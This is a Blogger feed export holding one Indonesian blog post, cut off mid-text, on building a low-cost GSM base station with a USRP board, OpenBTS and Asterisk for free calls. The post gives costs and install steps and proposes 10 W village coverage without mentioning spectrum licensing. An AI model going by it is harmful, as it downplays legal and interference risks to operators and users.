<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-11073134</id><updated>2012-01-26T16:15:43.179+07:00</updated><category term='linux'/><category term='OSx86'/><category term='GSM'/><category term='hacking'/><category term='cracking'/><category term='NMAP tutorial'/><category term='md5'/><category term='Internet'/><category term='Download Opera'/><category term='Asterik'/><category term='openBTS'/><category term='linux blackbox'/><title type='text'>Tips &amp; Trick</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://neoyudhax.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://neoyudhax.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>y u d h a x</name><uri>http://www.blogger.com/profile/11288479023899701739</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>24</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-11073134.post-8391696844642692758</id><published>2011-01-13T13:56:00.000+07:00</published><updated>2011-01-13T13:56:25.372+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Asterik'/><category scheme='http://www.blogger.com/atom/ns#' term='GSM'/><category scheme='http://www.blogger.com/atom/ns#' term='openBTS'/><title type='text'>Mudahnya Membuat Operator Selular Sendiri</title><content type='html'>&lt;div style="font-family: sans-serif; font-size: 13px; line-height: 1.5em; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em;"&gt;Pasti sebagian besar orang di Indonesia membayangkan bahwa membuat operator selular&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/GSM" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="GSM"&gt;GSM&lt;/a&gt;&amp;nbsp;sangat mahal dan ribet banget. Memang sih ada benarnya semua karena memang peralatan yang digunakan untuk membangun sebuah BTS GSM harganya mendekati Rp. 3 milyard per buahnya. Di jamin semua orang di Indonesia tidak akan ada yang bisa membuat BTS sendiri.&lt;/div&gt;&lt;div style="font-family: sans-serif; font-size: 13px; line-height: 1.5em; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em;"&gt;Kita harus bersyukur teknologi telah berkembang sedemikian majunya. Saat ini, kita BISA membuat BTS GSM sendiri! Alat yang dibutuhkan hanya USRP board sekitar US$1000-15000-an dengan bea masuk sekitar Rp. 8-10 juta-an. Ini mempunyai daya pancar kecil sekitar 200-300 mW saja. Di samping itu, kita perlu membuat sebuah sentral telepon kecil berbasis&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/VoIP" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="VoIP"&gt;VoIP&lt;/a&gt;di atas sebuah&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/Komputer" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="Komputer"&gt;komputer&lt;/a&gt;. Investasi&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/PC" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="PC"&gt;PC&lt;/a&gt;&amp;nbsp;ini bisa kelas Pentium IV dengan harga sangat murah sekarang ini sekitar Rp. 1-2 juta saja. Jadi minimal sekali untuk satu ruangan kita dapat membangun sebuah BTS GSM sendiri dengan investasi sekitar Rp. 10-20 juta-an.&lt;/div&gt;&lt;div style="font-family: sans-serif; font-size: 13px; line-height: 1.5em; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em;"&gt;Untuk jarak yang lebih jauh kita memang membutuhkan sebuah penguat sinyal&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/GSM" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="GSM"&gt;GSM&lt;/a&gt;&amp;nbsp;harganya sekitar Rp. 10-20 juta-an lagi tergantung daya yang kita ingin tambahkan. Untuk daya sekitar 10 Watt akan cukup untuk memberikan layanan untuk satu kecamatan, satu sekolah, satu pesantren atau satu kampung yang radius-nya sekitar 2-3 km. Jadi dengan modal sekitar Rp. 20-40 juta-an kita bisa membuat sendiri sebuah BTS GSM untuk satu wilayah kecil.&lt;/div&gt;&lt;div style="font-family: sans-serif; font-size: 13px; line-height: 1.5em; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em;"&gt;Bayangkan sebuah pesantren dengan 2000 santri, misalnya masing-masing santri bisanya membayar pulsa handphone mereka sekitar Rp. 20.000 / bulan. Maka akan uang untuk membuat&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/BTS" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="BTS"&gt;BTS&lt;/a&gt;&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/GSM" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="GSM"&gt;GSM&lt;/a&gt;&amp;nbsp;ini akan dapat terkumpul jika para santri bersedia infaq uang pulsanya selama satu bulan untuk BTS GSM buatan sendiri ini. Untuk selanjutnya para santri biasa menggunakan uang pulsa bulanannya untuk hal lain yang lebih produktif.&lt;/div&gt;&lt;div style="font-family: sans-serif; font-size: 13px; line-height: 1.5em; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font-family: sans-serif; font-size: 13px; line-height: 1.5em; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em;"&gt;&lt;/div&gt;&lt;h2 style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(170, 170, 170); border-bottom-style: solid; border-bottom-width: 1px; color: black; font-size: 19px; font-weight: normal; margin-bottom: 0.6em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0.17em; padding-top: 0.5em;"&gt;&lt;span class="mw-headline"&gt;Kebutuhan Alat&lt;/span&gt;&lt;/h2&gt;&lt;div style="line-height: 1.5em; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em;"&gt;Pertanyaan teknisnya. Dimana memperoleh software dan membeli peralatan yang dibutuhkan tersebut? Untuk konfigurasi minimal dengan daya 200-300 mW untuk sebuah ruangan saja maka jawabnya adalah,&lt;/div&gt;&lt;ul style="line-height: 1.5em; list-style-image: url(http://opensource.telkomspeedy.com/wiki/skins/monobook/bullet.gif); list-style-type: square; margin-bottom: 0px; margin-left: 1.5em; margin-right: 0px; margin-top: 0.3em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="margin-bottom: 0.1em;"&gt;Sebuah hardware&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/Universal_Software_Radio_Peripheral" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="Universal Software Radio Peripheral"&gt;Universal Software Radio Peripheral&lt;/a&gt;&amp;nbsp;(&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/USRP" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="USRP"&gt;USRP&lt;/a&gt;) yang bisa di beli / di pesan dari Ettus&amp;nbsp;&lt;a class="external free" href="http://www.ettus.com/" rel="nofollow" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://opensource.telkomspeedy.com/wiki/skins/monobook/external.png); background-origin: initial; background-position: 100% 50%; background-repeat: no-repeat no-repeat; color: #3366bb; padding-right: 13px; text-decoration: none;" title="http://www.ettus.com"&gt;http://www.ettus.com&lt;/a&gt;. Ini kunci utamanya.&lt;/li&gt;&lt;li style="margin-bottom: 0.1em;"&gt;Sebuah&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/PC" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="PC"&gt;PC&lt;/a&gt;&amp;nbsp;minimal Pentium IV untuk&amp;nbsp;&lt;a class="new" href="http://opensource.telkomspeedy.com/wiki/index.php?title=Sentral_telepon&amp;amp;action=edit" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #cc2200; text-decoration: none;" title="Sentral telepon"&gt;sentral telepon&lt;/a&gt;&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/VoIP" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="VoIP"&gt;VoIP&lt;/a&gt;-nya. Kayanya kalau ini sih banyak banget di Indonesia.&lt;/li&gt;&lt;li style="margin-bottom: 0.1em;"&gt;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/Sistem_Operasi" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="Sistem Operasi"&gt;Sistem Operasi&lt;/a&gt;&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/Ubuntu" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="Ubuntu"&gt;Ubuntu&lt;/a&gt;&amp;nbsp;bisa di ambil gratis di&amp;nbsp;&lt;a class="external free" href="http://www.ubuntu.com/" rel="nofollow" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://opensource.telkomspeedy.com/wiki/skins/monobook/external.png); background-origin: initial; background-position: 100% 50%; background-repeat: no-repeat no-repeat; color: #3366bb; padding-right: 13px; text-decoration: none;" title="http://www.ubuntu.com"&gt;http://www.ubuntu.com&lt;/a&gt;&amp;nbsp;atau di&amp;nbsp;&lt;a class="external free" href="http://kambing.ui.edu/" rel="nofollow" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://opensource.telkomspeedy.com/wiki/skins/monobook/external.png); background-origin: initial; background-position: 100% 50%; background-repeat: no-repeat no-repeat; color: #3366bb; padding-right: 13px; text-decoration: none;" title="http://kambing.ui.edu"&gt;http://kambing.ui.edu&lt;/a&gt;.&lt;/li&gt;&lt;li style="margin-bottom: 0.1em;"&gt;Software aplikasi&amp;nbsp;&lt;a class="new" href="http://opensource.telkomspeedy.com/wiki/index.php?title=GNURadio&amp;amp;action=edit" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #cc2200; text-decoration: none;" title="GNURadio"&gt;GNURadio&lt;/a&gt;&amp;nbsp;bisa di ambil di&amp;nbsp;&lt;a class="external free" href="http://gnuradio.org/redmine/wiki/gnuradio/Download" rel="nofollow" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://opensource.telkomspeedy.com/wiki/skins/monobook/external.png); background-origin: initial; background-position: 100% 50%; background-repeat: no-repeat no-repeat; color: #3366bb; padding-right: 13px; text-decoration: none;" title="http://gnuradio.org/redmine/wiki/gnuradio/Download"&gt;http://gnuradio.org/redmine/wiki/gnuradio/Download&lt;/a&gt;&lt;/li&gt;&lt;li style="margin-bottom: 0.1em;"&gt;Software aplikasi&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/OpenBTS" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="OpenBTS"&gt;OpenBTS&lt;/a&gt;&amp;nbsp;bisa di ambil gratis di&amp;nbsp;&lt;a class="external free" href="http://openbts.sourceforge.net/" rel="nofollow" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://opensource.telkomspeedy.com/wiki/skins/monobook/external.png); background-origin: initial; background-position: 100% 50%; background-repeat: no-repeat no-repeat; color: #3366bb; padding-right: 13px; text-decoration: none;" title="http://openbts.sourceforge.net/"&gt;http://openbts.sourceforge.net/&lt;/a&gt;&lt;/li&gt;&lt;li style="margin-bottom: 0.1em;"&gt;Software aplikasi&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/Asterisk" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="Asterisk"&gt;Asterisk&lt;/a&gt;&amp;nbsp;bisa di ambil gratis di&amp;nbsp;&lt;a class="external free" href="http://www.asterisk.org/" rel="nofollow" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://opensource.telkomspeedy.com/wiki/skins/monobook/external.png); background-origin: initial; background-position: 100% 50%; background-repeat: no-repeat no-repeat; color: #3366bb; padding-right: 13px; text-decoration: none;" title="http://www.asterisk.org"&gt;http://www.asterisk.org&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div style="line-height: 1.5em; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em;"&gt;Semua&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/Software" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="Software"&gt;software&lt;/a&gt;&amp;nbsp;yang digunakan adalah&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/Open_source" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="Open source"&gt;open source&lt;/a&gt;&amp;nbsp;jadi gratis bisa di ambil di&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/Internet" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="Internet"&gt;Internet&lt;/a&gt;. Yang agak susah untuk di beli adalah&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/Hardware" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="Hardware"&gt;hardware&lt;/a&gt;&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/USRP" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="USRP"&gt;USRP&lt;/a&gt;&amp;nbsp;saja.&lt;/div&gt;&lt;a href="" name="Teknik_Pembuatan" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;"&gt;&lt;/a&gt;&lt;h2 style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(170, 170, 170); border-bottom-style: solid; border-bottom-width: 1px; color: black; font-size: 19px; font-weight: normal; margin-bottom: 0.6em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0.17em; padding-top: 0.5em;"&gt;&lt;span class="editsection" style="float: right; font-size: 13px; margin-left: 5px;"&gt;[&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php?title=Mudahnya_Membuat_Operator_Selular_Sendiri%21_Nelepon_pakai_GSM_gratis_aja_kalee_..&amp;amp;action=edit&amp;amp;section=2" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="Edit section: Teknik Pembuatan"&gt;edit&lt;/a&gt;]&lt;/span&gt;&lt;span class="mw-headline"&gt;Teknik Pembuatan&lt;/span&gt;&lt;/h2&gt;&lt;div style="line-height: 1.5em; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em;"&gt;Teknik instalasi secara detail dapat di baca dengan mudah di Wiki tepatnya pada alamat&lt;/div&gt;&lt;ul style="line-height: 1.5em; list-style-image: url(http://opensource.telkomspeedy.com/wiki/skins/monobook/bullet.gif); list-style-type: square; margin-bottom: 0px; margin-left: 1.5em; margin-right: 0px; margin-top: 0.3em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="margin-bottom: 0.1em;"&gt;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/OpenBTS" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="OpenBTS"&gt;OpenBTS&lt;/a&gt;&lt;/li&gt;&lt;li style="margin-bottom: 0.1em;"&gt;&lt;a class="external free" href="http://opensource.telkomspeedy.com/wiki/index.php/Openbts" rel="nofollow" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://opensource.telkomspeedy.com/wiki/skins/monobook/external.png); background-origin: initial; background-position: 100% 50%; background-repeat: no-repeat no-repeat; color: #3366bb; padding-right: 13px; text-decoration: none;" title="http://opensource.telkomspeedy.com/wiki/index.php/Openbts"&gt;http://opensource.telkomspeedy.com/wiki/index.php/Openbts&lt;/a&gt;&lt;/li&gt;&lt;li style="margin-bottom: 0.1em;"&gt;&lt;a class="external free" href="http://belajar.internetsehat.org/wiki/index.php/Openbts" rel="nofollow" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://opensource.telkomspeedy.com/wiki/skins/monobook/external.png); background-origin: initial; background-position: 100% 50%; background-repeat: no-repeat no-repeat; color: #3366bb; padding-right: 13px; text-decoration: none;" title="http://belajar.internetsehat.org/wiki/index.php/Openbts"&gt;http://belajar.internetsehat.org/wiki/index.php/Openbts&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div style="line-height: 1.5em; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em;"&gt;Secara umum teknik instalasinya adalah sebagai berikut,&lt;/div&gt;&lt;ul style="line-height: 1.5em; list-style-image: url(http://opensource.telkomspeedy.com/wiki/skins/monobook/bullet.gif); list-style-type: square; margin-bottom: 0px; margin-left: 1.5em; margin-right: 0px; margin-top: 0.3em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="margin-bottom: 0.1em;"&gt;Instal sistem operasi Ubuntu, butuh waktu sekitar 30-40 menit-an.&lt;/li&gt;&lt;li style="margin-bottom: 0.1em;"&gt;Instalasi aplikasi GNURadio, butuh waktu sekitar 30-60 menit-an.&lt;/li&gt;&lt;li style="margin-bottom: 0.1em;"&gt;Instalasi aplikasi OpenBTS, butuh waktu sekitar 30 menit-an&lt;/li&gt;&lt;li style="margin-bottom: 0.1em;"&gt;Instalasi aplikasi asterisk, butuh waktu sekitar 20 menit-an.&lt;/li&gt;&lt;li style="margin-bottom: 0.1em;"&gt;Konfigurasi&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/VoIP" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="VoIP"&gt;VoIP&lt;/a&gt;&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/Softswitch" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="Softswitch"&gt;softswitch&lt;/a&gt;, butuh waktu sekitar 60 menit-an.&lt;/li&gt;&lt;/ul&gt;&lt;div style="line-height: 1.5em; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;a href="" name="Pengoperasian_BTS_GSM" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;"&gt;&lt;/a&gt;&lt;h2 style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(170, 170, 170); border-bottom-style: solid; border-bottom-width: 1px; color: black; font-size: 19px; font-weight: normal; margin-bottom: 0.6em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0.17em; padding-top: 0.5em;"&gt;&lt;span class="editsection" style="float: right; font-size: 13px; margin-left: 5px;"&gt;[&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php?title=Mudahnya_Membuat_Operator_Selular_Sendiri%21_Nelepon_pakai_GSM_gratis_aja_kalee_..&amp;amp;action=edit&amp;amp;section=3" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="Edit section: Pengoperasian BTS GSM"&gt;edit&lt;/a&gt;]&lt;/span&gt;&lt;span class="mw-headline"&gt;Pengoperasian BTS GSM&lt;/span&gt;&lt;/h2&gt;&lt;div style="line-height: 1.5em; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em;"&gt;Selesai sudah seluruh konfigurasi-nya dan kita bisa mengoperasikan&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/OpenBTS" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="OpenBTS"&gt;OpenBTS&lt;/a&gt;&amp;nbsp;untuk memberikan layanan&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/GSM" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="GSM"&gt;GSM&lt;/a&gt;&amp;nbsp;gratisan. Beberapa skenario / langkah operasi&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/OpenBTS" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="OpenBTS"&gt;OpenBTS&lt;/a&gt;&amp;nbsp;adalah&lt;/div&gt;&lt;ul style="line-height: 1.5em; list-style-image: url(http://opensource.telkomspeedy.com/wiki/skins/monobook/bullet.gif); list-style-type: square; margin-bottom: 0px; margin-left: 1.5em; margin-right: 0px; margin-top: 0.3em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="margin-bottom: 0.1em;"&gt;User menggunakan&amp;nbsp;&lt;a class="new" href="http://opensource.telkomspeedy.com/wiki/index.php?title=HP&amp;amp;action=edit" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #cc2200; text-decoration: none;" title="HP"&gt;HP&lt;/a&gt;&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/GSM" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="GSM"&gt;GSM&lt;/a&gt;&amp;nbsp;biasa scanning secara manual.&lt;/li&gt;&lt;li style="margin-bottom: 0.1em;"&gt;User berasosiasi ke&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/BTS" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="BTS"&gt;BTS&lt;/a&gt;&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/GSM" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="GSM"&gt;GSM&lt;/a&gt;&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/OpenBTS" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="OpenBTS"&gt;OpenBTS&lt;/a&gt;&lt;/li&gt;&lt;li style="margin-bottom: 0.1em;"&gt;User akan memperoleh&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/SMS" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="SMS"&gt;SMS&lt;/a&gt;&amp;nbsp;dari&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/OpenBTS" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="OpenBTS"&gt;OpenBTS&lt;/a&gt;&amp;nbsp;nomor IMSI-nya.&lt;/li&gt;&lt;li style="margin-bottom: 0.1em;"&gt;Admin memasukan nomor IMSI-nya agar bisa akses ke&amp;nbsp;&lt;a class="new" href="http://opensource.telkomspeedy.com/wiki/index.php?title=Sentral_telepon&amp;amp;action=edit" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #cc2200; text-decoration: none;" title="Sentral telepon"&gt;sentral telepon&lt;/a&gt;&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/Asterisk" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="Asterisk"&gt;asterisk&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;div style="line-height: 1.5em; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em;"&gt;Setelah Admin memasukan nomot&amp;nbsp;&lt;a class="new" href="http://opensource.telkomspeedy.com/wiki/index.php?title=IMSI&amp;amp;action=edit" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #cc2200; text-decoration: none;" title="IMSI"&gt;IMSI&lt;/a&gt;&amp;nbsp;ke SIP.conf di asterisk maka user akan dapat menggunakan&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/OpenBTS" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="OpenBTS"&gt;OpenBTS&lt;/a&gt;&amp;nbsp;tanpa bayar pulsa sama sekali.&lt;/div&gt;&lt;a href="" name="Pertanyaan" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;"&gt;&lt;/a&gt;&lt;h2 style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(170, 170, 170); border-bottom-style: solid; border-bottom-width: 1px; color: black; font-size: 19px; font-weight: normal; margin-bottom: 0.6em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0.17em; padding-top: 0.5em;"&gt;&lt;span class="editsection" style="float: right; font-size: 13px; margin-left: 5px;"&gt;[&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php?title=Mudahnya_Membuat_Operator_Selular_Sendiri%21_Nelepon_pakai_GSM_gratis_aja_kalee_..&amp;amp;action=edit&amp;amp;section=4" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="Edit section: Pertanyaan"&gt;edit&lt;/a&gt;]&lt;/span&gt;&lt;span class="mw-headline"&gt;Pertanyaan&lt;/span&gt;&lt;/h2&gt;&lt;div style="line-height: 1.5em; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em;"&gt;Pertanyaan yang sering di lontarkan antara lain 